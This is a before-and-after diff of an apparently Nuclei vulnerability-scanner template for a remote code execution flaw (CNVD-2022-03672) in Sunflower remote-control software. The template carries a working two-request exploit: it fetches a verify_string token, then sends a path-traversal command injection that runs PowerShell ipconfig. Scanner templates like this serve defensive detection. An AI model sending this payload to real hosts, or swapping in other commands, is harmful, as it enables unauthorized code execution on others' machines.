critical/CNVD-2022-03672.yaml (before)
id: CNVD-2022-03672

info:
  name: Sunflower Simple and Personal - Remote Code Execution
  author: daffainfo
  severity: critical
  description: Sunflower Simple and Personal is susceptible to a remote code execution vulnerability.
  reference:
    - https://www.1024sou.com/article/741374.html
    - https://copyfuture.com/blogs-details/202202192249158884
    - https://www.cnvd.org.cn/flaw/show/CNVD-2022-10270
    - https://www.cnvd.org.cn/flaw/show/CNVD-2022-03672
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10.0
    cwe-id: CWE-77
  tags: cnvd,cnvd2020,sunflower,rce

requests:
  - raw:
      - |
        POST /cgi-bin/rpc HTTP/1.1
        Host: {{Hostname}}

        action=verify-haras
      - |
        GET /check?cmd=ping../../../windows/system32/windowspowershell/v1.0/powershell.exe+ipconfig HTTP/1.1
        Host: {{Hostname}}
        Cookie: CID={{cid}}

    extractors:
      - type: regex
        name: cid
        internal: true
        group: 1
        regex:
          - '"verify_string":"(.*)"'

    req-condition: true
    matchers:
      - type: dsl
        dsl:
          - "status_code_1==200"
          - "status_code_2==200"
          - "contains(body_1, 'verify_string')"
          - "contains(body_2, 'Windows IP')"
        condition: and

# Enhanced by mp on 2022/05/12

critical/CNVD-2022-03672.yaml (after)
id: CNVD-2022-03672

info:
  name: Sunflower Simple and Personal - Remote Code Execution
  author: daffainfo
  severity: critical
  description: Sunflower Simple and Personal is susceptible to a remote code execution vulnerability.
  reference:
    - https://www.1024sou.com/article/741374.html
    - https://copyfuture.com/blogs-details/202202192249158884
    - https://www.cnvd.org.cn/flaw/show/CNVD-2022-10270
    - https://www.cnvd.org.cn/flaw/show/CNVD-2022-03672
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10
    cwe-id: CWE-77
  metadata:
    max-request: 2
  tags: cnvd,cnvd2020,sunflower,rce

http:
  - raw:
      - |
        POST /cgi-bin/rpc HTTP/1.1
        Host: {{Hostname}}

        action=verify-haras
      - |
        GET /check?cmd=ping../../../windows/system32/windowspowershell/v1.0/powershell.exe+ipconfig HTTP/1.1
        Host: {{Hostname}}
        Cookie: CID={{cid}}

    extractors:
      - type: regex
        name: cid
        internal: true
        group: 1
        regex:
          - '"verify_string":"(.*?)"'
    matchers:
      - type: dsl
        dsl:
          - "status_code_1==200"
          - "status_code_2==200"
          - "contains(body_1, 'verify_string')"
          - "contains(body_2, 'Windows IP')"
        condition: and

# digest: 4b0a00483046022100e0b8a978d4631823ced989441ed9dc7f4787e0865117f3774c90e5f27393ad3b022100a2f5705860233f76a0fd9a7a6cb44ff3db36963f9c04f4d8f57b519133f77112:922c64590222798bb761d5b6d8e72950

critical/CNVD-2022-03672.yaml (diff)
@@ -12,11 +12,13 @@ info:
     - https://www.cnvd.org.cn/flaw/show/CNVD-2022-03672
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
-    cvss-score: 10.0
+    cvss-score: 10
     cwe-id: CWE-77
+  metadata:
+    max-request: 2
   tags: cnvd,cnvd2020,sunflower,rce
 
-requests:
+http:
   - raw:
       - |
         POST /cgi-bin/rpc HTTP/1.1
@@ -34,9 +36,7 @@ requests:
         internal: true
         group: 1
         regex:
-          - '"verify_string":"(.*)"'
-
-    req-condition: true
+          - '"verify_string":"(.*?)"'
     matchers:
       - type: dsl
         dsl:
@@ -46,4 +46,4 @@ requests:
           - "contains(body_2, 'Windows IP')"
         condition: and
 
-# Enhanced by mp on 2022/05/12
+# digest: 4b0a00483046022100e0b8a978d4631823ced989441ed9dc7f4787e0865117f3774c90e5f27393ad3b022100a2f5705860233f76a0fd9a7a6cb44ff3db36963f9c04f4d8f57b519133f77112:922c64590222798bb761d5b6d8e72950
